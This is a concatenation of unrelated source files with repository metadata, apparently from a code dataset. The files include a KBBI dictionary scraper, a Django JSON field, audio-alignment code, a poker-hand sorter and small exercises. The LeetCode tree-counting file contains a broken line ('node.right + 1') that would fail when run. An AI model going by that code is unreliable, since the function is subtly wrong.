info += "HG: training time(min): %.1f, total time(min): %.1f" %( train_time/60.0, total_time/60.0)
print(info)
write_detailed_info(info)
if __name__ == '__main__':
tf.app.run()
|
[
"hguan2@jupiter.csc.ncsu.edu"
] |
hguan2@jupiter.csc.ncsu.edu
|
1bc13a4894ec6720d5b52ee578c45b2db8736649
|
25dc4d1f8bbe23ee5e0aac38f88e8f71978382d7
|
/Practica_Final/venv/Scripts/easy_install-3.8-script.py
|
2c227d39392de5be2c4544f4c8566736d9074675
|
[] |
no_license
|
jokermanjrj/Python
|
d316169fc4eb05be4b9d8bd3c207da80cad72af3
|
0a37c125bf4590d268ff8848698e95f42c428ebf
|
refs/heads/master
| 2020-09-14T17:43:14.367366
| 2019-12-17T17:03:02
| 2019-12-17T17:03:02
| 223,203,767
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 480
|
py
|
#!D:\Users\margueru\PycharmProjects\Practica_Final\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install-3.8'
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install-3.8')()
)
|
[
"jokermanjrj@gmail.com"
] |
jokermanjrj@gmail.com
|
0e98392bc4f340dbdc2e33a27361f618aa425e0f
|
3d5bcd57b893c95bbcbfafe77bbc33c65432c9ed
|
/Algorithms/LeetCode/L0222CountCompleteBT.py
|
bfc11d0a9aa5748cc23320ebfb9032176850b2a9
|
[] |
no_license
|
arunachalamev/PythonProgramming
|
c160f34c7cb90e82cd0d4762ff9dcb4abadf9c1c
|
ea188aaa1b72511aeb769a2829055d0aae55e73e
|
refs/heads/master
| 2021-06-04T03:50:37.976293
| 2020-11-12T19:52:28
| 2020-11-12T19:52:28
| 97,364,002
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 954
|
py
|
class Node:
def __init__(self, val, left=None, right=None):
self.val = val
self.left = left
self.right = right
tree = Node(4, Node(2, Node(1), Node(3)), Node(5, Node(6)))
def countNodes(root):
def exist(idx,d,root):
left,right = 0, 2**d - 1
node = root
for _ in range(d):
pivot = left + (right - left)//2
if idx <= pivot:
node = node.left
right = pivot
else:
node = node.right + 1
left = pivot
return node is not None
if not root:
return 0
d = 0
node = root
while node.left:
node = node.left
d = d + 1
left, right = 1, 2**d -1
while (left <= right):
pivot = left + (right -left )//2
if exist(pivot,d,root):
left = pivot + 1
else:
right = pivot -1
return 2**d -1 + left
print (countNodes(tree))
|
[
"arunachalamev@gmail.com"
] |
arunachalamev@gmail.com
|
959b341dec10e56fae4670c07e539f2bfb6d728b
|
9d904e52e49df52739c3287454469d5831b01ab0
|
/week4/minitorrent/minitorrent/server.py
|
b99059ca3950fde488ff4b15c69c3be71ca24e52
|
[] |
no_license
|
joeyabouharb/term2-challenges
|
dab54da02e9182d5633ec275667e07792934445b
|
6b10296dcb187024df75d7620b01a1d848313c95
|
refs/heads/master
| 2023-01-25T05:10:09.106671
| 2019-10-22T23:56:53
| 2019-10-22T23:56:53
| 203,889,286
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 468
|
py
|
"""
handles server/ web functionality for
torrent client.
"""
from flask import Flask, Response
import time
import getpass
app = Flask(__name__)
@app.route('/hello')
def greet():
def data_generator():
text = f"Hello, from {getpass.getuser()}"
for letter in text:
time.sleep(0.5)
yield letter
return Response(data_generator(), mimetype="text/plain")
if __name__ == '__main__':
app.run(host='0.0.0.0', port=1234)
|
[
"joey.abouharb@gmail.com"
] |
joey.abouharb@gmail.com
|
9aad7fa7d1a503f9eba210098993a05a32d1ed91
|
8afb5afd38548c631f6f9536846039ef6cb297b9
|
/MY_REPOS/INTERVIEW-PREP-COMPLETE/notes-n-resources/Data-Structures-N-Algo/_DS-n-Algos/Interview-Problems/HackerRank/Python/Introduction/Python-Division.py
|
4f8ebf6254287c1545a4e91b15393a9155977ae3
|
[
"MIT"
] |
permissive
|
bgoonz/UsefulResourceRepo2.0
|
d87588ffd668bb498f7787b896cc7b20d83ce0ad
|
2cb4b45dd14a230aa0e800042e893f8dfb23beda
|
refs/heads/master
| 2023-03-17T01:22:05.254751
| 2022-08-11T03:18:22
| 2022-08-11T03:18:22
| 382,628,698
| 10
| 12
|
MIT
| 2022-10-10T14:13:54
| 2021-07-03T13:58:52
| null |
UTF-8
|
Python
| false
| false
| 96
|
py
|
if __name__ == "__main__":
a = int(input())
b = int(input())
print(a // b)
print(a / b)
|
[
"bryan.guner@gmail.com"
] |
bryan.guner@gmail.com
|
1bcbd7efb3783683cf04688d856ed4cb0483668e
|
d4e2d0efb752f7aebeb48c2754d229ac4f6f089b
|
/kbbi/kbbi.py
|
7171529284bf1f4a1a97d63b9460cddbb424a99a
|
[
"MIT"
] |
permissive
|
noaione/kbbi-python
|
ce61d4f00d7a4925b69cf7129d8f9637ae486a62
|
063b4fe603c7187e88258bd1007e8c7ad51f50db
|
refs/heads/master
| 2020-11-25T14:30:41.653374
| 2020-03-17T15:07:46
| 2020-03-17T15:07:46
| 228,717,022
| 0
| 0
|
MIT
| 2019-12-17T23:07:59
| 2019-12-17T23:07:59
| null |
UTF-8
|
Python
| false
| false
| 11,510
|
py
|
"""
:mod:`kbbi` -- Modul KBBI Python
================================
.. module:: kbbi
:platform: Unix, Windows, Mac
:synopsis: Modul ini mengandung implementasi dari modul kbbi.
.. moduleauthor:: sage <laymonage@gmail.com>
"""
import argparse
import json
import sys
from urllib.parse import quote
import requests
from bs4 import BeautifulSoup
class KBBI:
"""Sebuah laman dalam KBBI daring."""
host = "https://kbbi.kemdikbud.go.id"
def __init__(self, kueri):
"""Membuat objek KBBI baru berdasarkan kueri yang diberikan.
:param kueri: Kata kunci pencarian
:type kueri: str
"""
self.nama = kueri
self._init_pranala()
laman = requests.get(self.pranala)
self._cek_galat(laman)
self._init_entri(laman)
def _init_pranala(self):
kasus_khusus = [
"." in self.nama,
"?" in self.nama,
self.nama.lower() == "nul",
self.nama.lower() == "bin",
]
if any(kasus_khusus):
self.pranala = f"{self.host}/Cari/Hasil?frasa={quote(self.nama)}"
else:
self.pranala = f"{self.host}/entri/{quote(self.nama)}"
def _cek_galat(self, laman):
if "Beranda/Error" in laman.url:
raise TerjadiKesalahan()
if "Beranda/BatasSehari" in laman.url:
raise BatasSehari()
if "Entri tidak ditemukan." in laman.text:
raise TidakDitemukan(self.nama)
def _init_entri(self, laman):
sup = BeautifulSoup(laman.text, "html.parser")
estr = ""
self.entri = []
for label in sup.find("hr").next_siblings:
if label.name == "hr":
if label.get("style") is None:
self.entri.append(Entri(estr))
break
else:
continue
if label.name == "h2":
if label.get("style") == "color:gray":
continue
if estr:
self.entri.append(Entri(estr))
estr = ""
estr += str(label).strip()
def serialisasi(self):
"""Mengembalikan hasil serialisasi objek KBBI ini.
:returns: Dictionary hasil serialisasi
:rtype: dict
"""
return {
"pranala": self.pranala,
"entri": [entri.serialisasi() for entri in self.entri],
}
def __str__(self, contoh=True):
return "\n\n".join(
entri.__str__(contoh=contoh) for entri in self.entri
)
def __repr__(self):
return f"<KBBI: {self.nama}>"
class Entri:
"""Sebuah entri dalam sebuah laman KBBI daring."""
def __init__(self, entri_html):
entri = BeautifulSoup(entri_html, "html.parser")
judul = entri.find("h2")
self._init_nama(judul)
self._init_nomor(judul)
self._init_kata_dasar(judul)
self._init_pelafalan(judul)
self._init_varian(judul)
self._init_makna(entri)
def _init_nama(self, judul):
self.nama = ambil_teks_dalam_label(judul, ambil_italic=True)
if not self.nama:
self.nama = judul.find_all(text=True)[0].strip()
def _init_nomor(self, judul):
nomor = judul.find("sup", recursive=False)
self.nomor = nomor.text.strip() if nomor else ""
def _init_kata_dasar(self, judul):
dasar = judul.find_all(class_="rootword")
self.kata_dasar = []
for tiap in dasar:
kata = tiap.find("a")
dasar_no = kata.find("sup")
kata = ambil_teks_dalam_label(kata)
self.kata_dasar.append(
f"{kata} ({dasar_no.text.strip()})" if dasar_no else kata
)
def _init_pelafalan(self, judul):
lafal = judul.find(class_="syllable")
self.pelafalan = lafal.text.strip() if lafal else ""
def _init_varian(self, judul):
varian = judul.find("small")
self.bentuk_tidak_baku = []
self.varian = []
if varian:
bentuk_tidak_baku = varian.find_all("b")
if bentuk_tidak_baku:
self.bentuk_tidak_baku = "".join(
e.text.strip() for e in bentuk_tidak_baku
).split(", ")
else:
self.varian = (
varian.text[len("varian: ") :].strip().split(", ")
)
def _init_makna(self, entri):
if entri.find(color="darkgreen"):
makna = [entri]
else:
makna = entri.find_all("li")
self.makna = [Makna(m) for m in makna]
def serialisasi(self):
return {
"nama": self.nama,
"nomor": self.nomor,
"kata_dasar": self.kata_dasar,
"pelafalan": self.pelafalan,
"bentuk_tidak_baku": self.bentuk_tidak_baku,
"varian": self.varian,
"makna": [makna.serialisasi() for makna in self.makna],
}
def _makna(self, contoh=True):
if len(self.makna) > 1:
return "\n".join(
f"{i}. {makna.__str__(contoh=contoh)}"
for i, makna in enumerate(self.makna, 1)
)
if len(self.makna) == 1:
return self.makna[0].__str__(contoh=contoh)
return ""
def _nama(self):
hasil = self.nama
if self.nomor:
hasil += f" ({self.nomor})"
if self.kata_dasar:
hasil = f"{' » '.join(self.kata_dasar)} » {hasil}"
return hasil
def _varian(self, varian):
if varian == self.bentuk_tidak_baku:
nama = "bentuk tidak baku"
elif varian == self.varian:
nama = "varian"
else:
return ""
return f"{nama}: {', '.join(varian)}"
def __str__(self, contoh=True):
hasil = self._nama()
if self.pelafalan:
hasil += f" {self.pelafalan}"
for var in (self.bentuk_tidak_baku, self.varian):
if var:
hasil += f"\n{self._varian(var)}"
return f"{hasil}\n{self._makna(contoh)}"
def __repr__(self):
return f"<Entri: {self._nama()}>"
class Makna:
"""Sebuah makna dalam sebuah entri KBBI daring."""
def __init__(self, makna_label):
self._init_submakna(makna_label)
self._init_kelas(makna_label)
self._init_contoh(makna_label)
self.submakna = self.submakna.split("; ")
def _init_submakna(self, makna_label):
baku = makna_label.find("a")
if baku:
self.submakna = f"→ {ambil_teks_dalam_label(baku)}"
nomor = baku.find("sup")
if nomor:
self.submakna += f" ({nomor.text.strip()})"
else:
self.submakna = (
"".join(
i.string for i in makna_label.contents if i.name != "font"
)
.strip()
.rstrip(":")
)
def _init_kelas(self, makna_label):
kelas = makna_label.find(color="red")
lain = makna_label.find(color="darkgreen")
info = makna_label.find(color="green")
if kelas:
kelas = kelas.find_all("span")
if lain:
kelas = [lain]
self.submakna = lain.next_sibling.strip()
self.submakna += (
f" {makna_label.find(color='grey').get_text().strip()}"
)
self.kelas = []
for k in kelas:
kode = k.text.strip()
pisah = k["title"].strip().split(": ")
nama = pisah[0].strip()
deskripsi = pisah[1].strip() if len(pisah) > 1 else ""
self.kelas.append(
{"kode": kode, "nama": nama, "deskripsi": deskripsi}
)
self.info = ""
if info:
info = info.text.strip()
if not any(info == k["kode"] for k in self.kelas):
self.info = info
def _init_contoh(self, makna_label):
indeks = makna_label.text.find(": ")
if indeks != -1:
contoh = makna_label.text[indeks + 2 :].strip()
self.contoh = contoh.split("; ")
else:
self.contoh = []
def serialisasi(self):
return {
"kelas": self.kelas,
"submakna": self.submakna,
"info": self.info,
"contoh": self.contoh,
}
def _kelas(self):
return " ".join(f"({k['kode']})" for k in self.kelas)
def _submakna(self):
return "; ".join(self.submakna)
def _contoh(self):
return "; ".join(self.contoh)
def __str__(self, contoh=True):
hasil = f"{self._kelas()} " if self.kelas else ""
hasil += self._submakna()
hasil += f" {self.info}" if self.info else ""
hasil += f": {self._contoh()}" if contoh and self.contoh else ""
return hasil
def __repr__(self):
return f"<Makna: {'; '.join(self.submakna)}>"
def ambil_teks_dalam_label(sup, ambil_italic=False):
"""Mengambil semua teks dalam sup label HTML (tanpa anak-anaknya).
:param sup: BeautifulSoup/Tag dari suatu label HTML
:type sup: BeautifulSoup/Tag
:returns: String semua teks dalam sup label HTML
:rtype: str
"""
if ambil_italic:
italic = sup.find("i")
if italic:
sup = italic
return "".join(i.strip() for i in sup.find_all(text=True, recursive=False))
class TidakDitemukan(Exception):
"""
Galat yang menunjukkan bahwa laman tidak ditemukan dalam KBBI.
"""
def __init__(self, kueri):
super().__init__(f"{kueri} tidak ditemukan dalam KBBI!")
class TerjadiKesalahan(Exception):
"""
Galat yang menunjukkan bahwa terjadi kesalahan dari pihak KBBI.
Laman: https://kbbi.kemdikbud.go.id/Beranda/Error
"""
def __init__(self):
super().__init__("Terjadi kesalahan saat memproses permintaan Anda.")
class BatasSehari(Exception):
"""
Galat yang menunjukkan bahwa pencarian telah mencapai
batas maksimum dalam sehari.
Laman: https://kbbi.kemdikbud.go.id/Beranda/BatasSehari
"""
def __init__(self):
super().__init__(
"Pencarian Anda telah mencapai batas maksimum dalam sehari."
)
def _parse_args(args):
parser = argparse.ArgumentParser()
parser.add_argument(
"laman", help='Laman yang ingin diambil, contoh: "cinta"'
)
parser.add_argument(
"-t",
"--tanpa-contoh",
help="jangan tampilkan contoh (bila ada)",
action="store_true",
)
parser.add_argument(
"-j",
"--json",
help="tampilkan hasil (selalu dengan contoh) dalam bentuk JSON",
action="store_true",
)
parser.add_argument(
"-i",
"--indentasi",
help="gunakan indentasi sebanyak N untuk serialisasi JSON",
type=int,
metavar="N",
)
return parser.parse_args(args)
def _keluaran(laman, args):
if args.json:
return json.dumps(laman.serialisasi(), indent=args.indentasi)
else:
return laman.__str__(contoh=not args.tanpa_contoh)
def main(argv=None):
"""Program utama dengan CLI."""
if argv is None:
argv = sys.argv[1:]
args = _parse_args(argv)
try:
laman = KBBI(args.laman)
except (TidakDitemukan, TerjadiKesalahan, BatasSehari) as e:
print(e)
else:
print(_keluaran(laman, args))
if __name__ == "__main__":
main()
|
[
"laymonage@gmail.com"
] |
laymonage@gmail.com
|
ab0c97be8356d23ee69f80c1faab35862a64cd41
|
7798c5171e4f63b40e9a2d9ae16f4e0f60855885
|
/movies/fields.py
|
f47d03541e5243ebc5e832afe7b5c78251b75f87
|
[] |
no_license
|
mstepniowski/wffplanner
|
d2d5ddd2938bd2b7b294332dad0d24fa63c2700a
|
62d1d00ca9a546b759e5c394c7a9da06484a7aa3
|
refs/heads/master
| 2020-05-20T06:04:22.413395
| 2015-10-01T16:12:48
| 2015-10-01T16:12:48
| 6,033,243
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,478
|
py
|
import base64
import zlib
import json
from django import forms
from django.forms import widgets
from django.db import models
from django.core import exceptions
from django.core.serializers.json import DjangoJSONEncoder
class JSONTextareaWidget(widgets.Textarea):
def render(self, name, value, attrs=None):
if isinstance(value, basestring):
# value seems to be already encoded
return super(JSONTextareaWidget, self).render(name, value, attrs)
try:
value = json.dumps(value, cls=DjangoJSONEncoder, sort_keys=True)
return super(JSONTextareaWidget, self).render(name, value, attrs)
except TypeError, e:
raise ValueError(e)
class JSONFormField(forms.CharField):
widget = JSONTextareaWidget
def __init__(self, *args, **kwargs):
self.json_type = kwargs.pop('json_type', None)
super(JSONFormField, self).__init__(*args, **kwargs)
def clean(self, value):
value = super(JSONFormField, self).clean(value)
try:
json_value = json.loads(value)
if self.json_type is not None and not isinstance(json_value, self.json_type):
raise forms.ValidationError('JSON object is not of type %s' % self.json_type)
return value
except ValueError, e:
raise forms.ValidationError('Enter a valid JSON value. Error: %s' % e)
class JSONField(models.TextField):
"""JSONField is a generic textfield that neatly serializes/unserializes
JSON objects seamlessly"""
# Used so to_python() is called
__metaclass__ = models.SubfieldBase
# Minimum length of value before compression kicks in
compression_threshold = 64
def __init__(self, verbose_name=None, json_type=None, compress=False, *args, **kwargs):
self.json_type = json_type
self.compress = compress
super(JSONField, self).__init__(verbose_name, *args, **kwargs)
# An accesor used only in South introspection,
# which stupidly calls any callable it receives
# and then runs repr on it!
def get_json_type(self):
class Repr:
"""A class that always returns the __repr__ it's told to."""
def __init__(self, repr):
self.repr = repr
def __repr__(self):
return self.repr
if self.json_type is None:
return None
else:
return Repr(self.json_type.__name__)
def to_python(self, value):
"""Convert our string value to JSON after we load it from the DB"""
if isinstance(value, basestring):
if self.compress and value.startswith('zlib;;'):
value = zlib.decompress(base64.decodestring(value[6:]))
try:
value = json.loads(value)
except ValueError:
pass
if self.json_type and not isinstance(value, self.json_type):
raise exceptions.ValidationError(
"%r is not of type %s (error occured when trying to access "
"'%s.%s' field)" %
(value, self.json_type, self.model._meta.db_table, self.name))
return value
def get_db_prep_save(self, value, connection):
"""Convert our JSON object to a string before we save"""
if self.json_type and not isinstance(value, self.json_type):
raise TypeError("%r is not of type %s" % (value, self.json_type))
try:
value = json.dumps(value)
except TypeError, e:
raise ValueError(e)
if self.compress and len(value) >= self.compression_threshold:
value = 'zlib;;' + base64.encodestring(zlib.compress(value))
return super(JSONField, self).get_db_prep_save(value, connection=connection)
def value_to_string(self, obj):
value = self._get_val_from_obj(obj)
return self.get_db_prep_value(value)
def formfield(self, **kwargs):
defaults = {'form_class': JSONFormField, 'json_type': self.json_type}
defaults.update(kwargs)
return super(JSONField, self).formfield(**defaults)
try:
from south.modelsinspector import add_introspection_rules
except ImportError:
pass
else:
add_introspection_rules([(
[JSONField],
[],
{
'json_type': ['get_json_type', {'default': None}],
'compress': ['compress', {'default': False}],
},
)], ["^movies\.fields\.JSONField"])
|
[
"marek@stepniowski.com"
] |
marek@stepniowski.com
|
b45258c2fbb47a193d71099a6ed42c0ced1e3667
|
a12c1498ab5f87c57453fa8a5cf421f7598f1a19
|
/alignment.py
|
8981b2eca80c73f3f0629346231e90bf48ec58f2
|
[] |
no_license
|
VascoXu/SmashAudio
|
b8c379f166f4bbe23b6e935636ba3888dc51ace2
|
7a16b195a3ce668516f8c559b019fbccc3495e9d
|
refs/heads/master
| 2023-03-03T02:22:04.141856
| 2021-02-07T00:19:42
| 2021-02-07T00:19:42
| 277,709,536
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,078
|
py
|
# https://github.com/allisonnicoledeal/VideoSync/blob/master/alignment_by_row_channels.py
import scipy.io.wavfile
import numpy as np
import scipy as sc
from scipy import signal
import matplotlib.pyplot as plt
import scipy.io.wavfile as wavfile
from scipy.signal import find_peaks
from pydub import AudioSegment
from itertools import groupby
import math
def normalize_audio(sound, target_dBFS):
"""Normalize audio"""
change_in_dBFS = target_dBFS - sound.dBFS
return sound.apply_gain(change_in_dBFS)
def detect_leading_silence(sound, silence_threshold=-30.0, chunk_size=5):
"""Find leading silence"""
trim_ms = 0
assert chunk_size > 0
while sound[trim_ms:trim_ms+chunk_size].dBFS < silence_threshold and trim_ms < len(sound):
trim_ms += chunk_size
return trim_ms
def find_beep(audio):
"""Find Beep by Mayank Goel"""
fs_audio,y_audio = wavfile.read(audio)
try:
y_audio = y_audio[:,0]
except:
pass
y_trimmed = y_audio[:(int)(y_audio.shape[0])]
FFT_SIZE = 256
NOVERLAP = (3*FFT_SIZE/4)
f,t,pxx = signal.spectrogram(y_trimmed, nperseg=FFT_SIZE, fs=fs_audio, noverlap=NOVERLAP)
trackBeep = np.argmax(pxx,0)
sounds = [list(b) for a, b, in groupby(enumerate(trackBeep), lambda x: x[1])]
beep = max(sounds, key = lambda sub: len(list(sub)))
first_oc = beep[0][0]
last_oc = beep[len(beep) - 1][0]
length = t[last_oc] - t[first_oc]
return (t[first_oc], length)
def sync_audio(audio1, audio2):
"""Sync Audio by finding beep sound"""
sync_point1 = find_beep(audio1)
sync_point2 = find_beep(audio2)
return {'sync_point1': sync_point1, 'sync_point2': sync_point2}
def normalize_align(audio1, audio2):
"""Align audio through normalize"""
sound1 = AudioSegment.from_wav("temp1.wav")
sound2 = AudioSegment.from_file("temp2.m4a")
normalized_sound = normalize_audio(sound2, sound1.dBFS)
sync1 = (detect_leading_silence(sound1) / 1000)
sync2 = (detect_leading_silence(normalized_sound) / 1000)
return (sync1, sync2)
|
[
"vax1@pitt.edu"
] |
vax1@pitt.edu
|
981cbab9c5bd1127874bf4e954e37da9d09bb6a7
|
3d8b77daceb1fc2ca4b3683cd9ad806a21069742
|
/ssstest.py
|
96dd1680af3d80f235c975ab393a7afc515e2a6a
|
[] |
no_license
|
1647790440/test
|
7226f248f20fb0437e0a61e3f936f9b8b67dc760
|
876ed1f9d8c59624d8471b760fa0d2d3be0b3d74
|
refs/heads/master
| 2020-08-15T04:44:51.063578
| 2019-10-15T11:36:35
| 2019-10-15T11:36:35
| 215,281,795
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 12,640
|
py
|
#十三水理牌算法
#初版
import collections
# def get_str():
# card_string = ""
# return card_string
#把字符串转变成为卡牌
def stl(card_string):
card_list = []
card_list = card_string.split(' ')
return card_list
#print(stl("*2 *4 *3 *5 *6 $A *7 *8 *9 *10 *J *Q *K *A")) 单元测试
def cut_card(card_list,select_best):
t_list = card_list
t_list = sorted(set(card_list) - set(select_best),key=t_list.index) #保证顺序
return t_list
#print(cut_card(['*2', '*3', '*4', '*5', '*6', '*7', '*8', '*9', '*10', '*J', '*Q', '*K', '*A'],['*2', '*4', '*5', '*6', '*7', '*8', '*10', '*Q', '*K', '*A']))
#对卡牌进行排序
def seq(card_list):
card_dict = {'2':2,'3':3,'4':4,'5':5,'6':6,'7':7,'8':8,'9':9,'10':10,'J':11,'Q':12,'K':13,'A':14} #大小比对
card_dict_ordered = collections.OrderedDict()
#card_list = []
card_list_ordered = []
seq_card_list = []
#card_list = stl(card_string)
#card_list = ['*2', '*4', '*5', '*7','*6', '*8', '*10', '*Q', '*K', '*A','$A'] #测试
#card_list.reverse() #测试
#print(card_list) #测试
#a = '2' #测试
#print(card_dict[a])
for item in card_list:
str = item[1:]
value = card_dict[str]
card_dict_ordered[item] = value
card_dict_ordered=collections.Counter(card_dict_ordered).most_common()
for item in card_dict_ordered:
card_list_ordered.append(item[0])
#print(card_list_ordered) #测试
#print(card_dict_ordered) #测试
#print(type(card_dict_ordered)) #测试
seq_card_list = card_list_ordered
return seq_card_list
#print(seq(['*2', '*4', '*5', '*7','*6', '*8', '*10', '*Q', '*K', '*A','$A']))
#对卡牌花色进行挑选
def select_suit(card_list):
spade_list = [] #$
heart_list = [] #&
diamond_list = [] ##
club_list = [] #*
for item in card_list:
if(item[0] == '$'):
spade_list.append(item)
elif(item[0] == '&'):
heart_list.append(item)
elif(item[0] == '#'):
diamond_list.append(item)
else:
club_list.append(item)
return spade_list,heart_list,diamond_list,club_list
#这边要给一个测试样例
# spade_list,heart_list,diamond_list,club_list = select_suit(['&2', '*4', '$5', '#6', '*7', '*8', '#10', '*Q', '#K', '*A','$A'])
# print(spade_list)
# print(heart_list)
# print(diamond_list)
# print(club_list)
#分出炸弹、三条、对子、散牌
def select_pair(card_list):
c_list = card_list.copy()
c_list.append("^B") #重点
one = []
two = []
three = []
four = []
t_list = []
for i in range(len(c_list)-1):
t_list.append(c_list[i])
#print(t_list)
#print(c_list[i])
if(c_list[i][1:] != c_list[i+1][1:]):
if(len(t_list) == 1):
one.append(t_list)
elif(len(t_list) == 2):
two.append(t_list)
elif(len(t_list) == 3):
three.append(t_list)
else:
four.append(t_list)
t_list = []
#print(card_list)
#print(c_list)
return one,two,three,four
# one,two,three,four = select_pair(['&2', '*2', '$2', '#2', '*7', '*K', '#K', '*K', '#K', '*A','$A'])
# print(one)
# print(two)
# print(three)
# print(four)
#去掉重复的牌,用来检查顺子
def remove_same_card(card_list):
#print(card_list)
card_dict = {'2':2,'3':3,'4':4,'5':5,'6':6,'7':7,'8':8,'9':9,'10':10,'J':11,'Q':12,'K':13,'A':14} #大小比对
number_card_list = []
digital_card_list = []
for item in card_list:
number_card_list.append(item[1:])
number_card_list = sorted(set(number_card_list),key=number_card_list.index)
for item in number_card_list:
digital_card_list.append(card_dict[item])
#print(digital_card_list)
return digital_card_list
#print(remove_same_card(['&2', '*2', '$2', '#2', '*7', '*K', '#K', '*K', '#K', '*A','$A']))
#挑出顺子
def select_digital(digital_card_list):
for i in range(len(digital_card_list)-4):
if(digital_card_list[i] == digital_card_list[i+4]+4):
#证明是顺子
return digital_card_list[i]
#只能证明存在顺子,但是得不到牌
return False
#挑出顺子
def select_straight(card_list):
digital_card_list = remove_same_card(card_list)
digital = select_digital(digital_card_list)
if(digital == False):
return []
card_dict = {'2':2,'3':3,'4':4,'5':5,'6':6,'7':7,'8':8,'9':9,'10':10,'J':11,'Q':12,'K':13,'A':14} #大小比对
straight_card_list = []
for i in range(len(card_list)):
if(card_dict[card_list[i][1:]] == digital):
straight_card_list.append(card_list[i])
digital = digital - 1
if(len(straight_card_list) == 5):
break
return straight_card_list
#print(select_straight(['&A', '*K', '$Q', '#J', '*10', '*9', '#8', '*7', '#6', '*5','$4']))
#判断是否存在特殊牌型
#放弃不写
# def if_is_special_card():
# special_card = []
# return special_card
#找出剩余手牌中最大的选项
#后敦和中敦都可以使用这个算法
#前敦不需要再一个函数了,去掉中墩和后敦之后剩下的就是前敦了
#主函数
def select_best(card_list):
card_dict = {'2':2,'3':3,'4':4,'5':5,'6':6,'7':7,'8':8,'9':9,'10':10,'J':11,'Q':12,'K':13,'A':14} #大小比对
# first_card_list = []
# second_card_list = []
# third_card_list = []
best_card_list = [] #要换成空列表
if(len(card_list) == 3):
best_card_list = card_list
#print("乌龙")
return best_card_list #这个return不太行
#前期准备
spade_list,heart_list,diamond_list,club_list = select_suit(card_list)
one_list,two_list,three_list,four_list = select_pair(card_list)
#同花顺——》炸弹——》葫芦——》同花——》顺子——》三条——》两对——》对子——》散牌
#顺子不好搞定 解决了
#要重新考虑
#同花顺
if(len(spade_list) >= 5):
best_card_list = select_straight(spade_list)
elif(len(heart_list) >= 5):
best_card_list = select_straight(heart_list)
elif(len(diamond_list) >= 5):
best_card_list = select_straight(diamond_list)
else:
best_card_list = select_straight(club_list)
if(len(best_card_list) != 0): #这个不是很好
#print("同花顺")
return best_card_list
#炸弹
if(len(four_list) != 0):
best_card_list = four_list[0]
if(len(one_list) != 0):
best_card_list.append(one_list[-1][0])
#print("炸弹")
return best_card_list
elif(len(two_list) != 0):
best_card_list.append(two_list[-1][0])
#print("炸弹")
return best_card_list
else:
best_card_list.append(three_list[-1][0])
#print("炸弹")
return best_card_list
#葫芦
if(len(two_list) != 0 and len(three_list) != 0):
best_card_list = three_list[0] + two_list[-1]
#print("葫芦")
return best_card_list
elif(len(two_list) == 0 and len(three_list) >= 2):
best_card_list = three_list[0] + three_list[1][:1]
#print("葫芦")
return best_card_list
#同花
if(len(spade_list) >= 5):
best_card_list = spade_list[:5]
if(len(heart_list) >= 5):
if(len(best_card_list) != 0):
# print(1)
# print(best_card_list)
if(card_dict[best_card_list[0][1:]] < card_dict[heart_list[0][1:]]):
best_card_list = heart_list[:5]
else:
best_card_list = heart_list[:5]
if(len(diamond_list) >= 5):
if(len(best_card_list) != 0):
# print(2)
# print(best_card_list)
if(card_dict[best_card_list[0][1:]] < card_dict[diamond_list[0][1:]]):
best_card_list = diamond_list[:5]
else:
best_card_list = diamond_list[:5]
if(len(club_list) >= 5):
if(len(best_card_list) != 0):
# print(3)
# print(best_card_list)
if(card_dict[best_card_list[0][1:]] < card_dict[club_list[0][1:]]):
best_card_list = club_list[:5]
else:
best_card_list = club_list[:5]
if(len(best_card_list) != 0):
#print("同花")
return best_card_list
#顺子
best_card_list = select_straight(card_list)
if(len(best_card_list) != 0):
#print("顺子")
return best_card_list
#三条
if(len(three_list) != 0):
best_card_list = three_list[0] + one_list[0] + one_list[1]
#print("三条")
return best_card_list
#两对
if(len(two_list) >= 2):
best_card_list = two_list[0] + two_list[1] + one_list[0]
#print("两对")
return best_card_list
#对子
if(len(two_list) == 1):
best_card_list = two_list[0] + one_list[0] + one_list[1] + one_list[2]
#print("对子")
return best_card_list
#散牌
for item in one_list:
best_card_list = best_card_list + item
if(len(best_card_list) == 5):
break
#print("乌龙")
return best_card_list
def main_function(card_string):
#变量定义
#好像并不是很需要变量定义
card_list = []
card_string_list = []
#前中后
first_card_list = []
second_card_list = []
third_card_list = []
#四花色
# spade_list = [] #$
# heart_list = [] #&
# diamond_list = [] ##
# club_list = [] #*
#取排
#todo
#card_string = "#A $2 #3 $4 #5 $6 #7 $8 #9 $10 #J $Q #K" #测试
card_list = stl(card_string)
#理牌
#排序
card_list = seq(card_list)
#spade_list,heart_list,diamond_list,club_list = select_suit(card_list)
# #后敦
#print("后敦")
third_card_list = select_best(card_list)
card_list = cut_card(card_list,third_card_list) #变成集合的过程中 还能保持有序吗?这是个问题 已经解决
third_card_list.reverse()
third_card_string = " ".join(third_card_list)
#print(third_card_string)
#中敦
#print("中敦")
second_card_list = select_best(card_list)
card_list = cut_card(card_list,second_card_list)
second_card_list.reverse()
second_card_string = " ".join(second_card_list)
#print(second_card_string)
#前敦
#print("前敦")
first_card_list = select_best(card_list)
first_card_list.reverse()
first_card_string = " ".join(first_card_list)
#print(first_card_string)
#first_card_string,second_card_string,third_card_string
card_string_list.append(first_card_string)
card_string_list.append(second_card_string)
card_string_list.append(third_card_string)
#print(card_string_list)
return card_string_list
main_function("*4 *3 &4 $Q *Q &10 &A *8 *6 *5 #4 *9 $J")
main_function("&5 $9 &K *7 #Q &J &7 &4 $5 $A *9 $8 #2")
main_function("&5 #J #A &8 &K $7 #3 *8 #8 #5 $6 *3 #2")
main_function("&10 &4 #Q *A *10 #K $4 $K #2 $J &K $3 $6")
main_function("#10 *6 $Q *K &Q #Q *10 *J &5 $3 $8 $K $J")
main_function("#K #4 *10 &Q $6 $J #8 *8 $5 &10 $3 &K $Q")
main_function("$9 $J &A #3 *9 #J *8 $6 #4 $K #7 &9 $7")
